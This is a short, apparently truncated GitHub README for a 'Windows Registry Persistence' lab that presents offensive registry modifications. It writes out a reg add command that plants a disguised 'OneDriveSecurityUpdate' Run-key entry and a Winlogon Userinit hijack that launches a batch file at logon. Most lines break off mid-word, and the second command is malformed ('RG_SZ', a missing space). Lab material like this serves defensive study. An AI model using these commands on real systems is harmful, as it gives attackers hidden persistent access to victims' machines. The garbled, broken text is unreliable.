sissco-bit/Windows-Registry-Persistence-Analysis

Windows Registry Persistence: Exploitation & Telemetry Engineering Lab A hands-on engineering lab mapping offensive registry modification mechanics (`HKCU` and `HK> ## 🏗 Architectural Overview Malicious actors look for silent ways to survive system reboots without re-triggering infect> 1. **User-Level Authority (`HKCU\...\Run`):** Executes commands whenever a targeted user aut> 2. **Machine-Level Authority (`HKLM\...\Winlogon`):** An escalated system foothold. By hijac> ## 💥 Offensive Simulation (Lab Mechanics) ### 1. User-Level Foothold Deployment To deploy an obscure user startup entry without administrative rights: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "OneDriveSecurityUpdate" /t > ### 2. System-Level Execution Escalation reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"/t "RG_SZ" /d "C:\Windows\System32\userinit.exe, C:\Users\Public\UpdateTask.bat" /f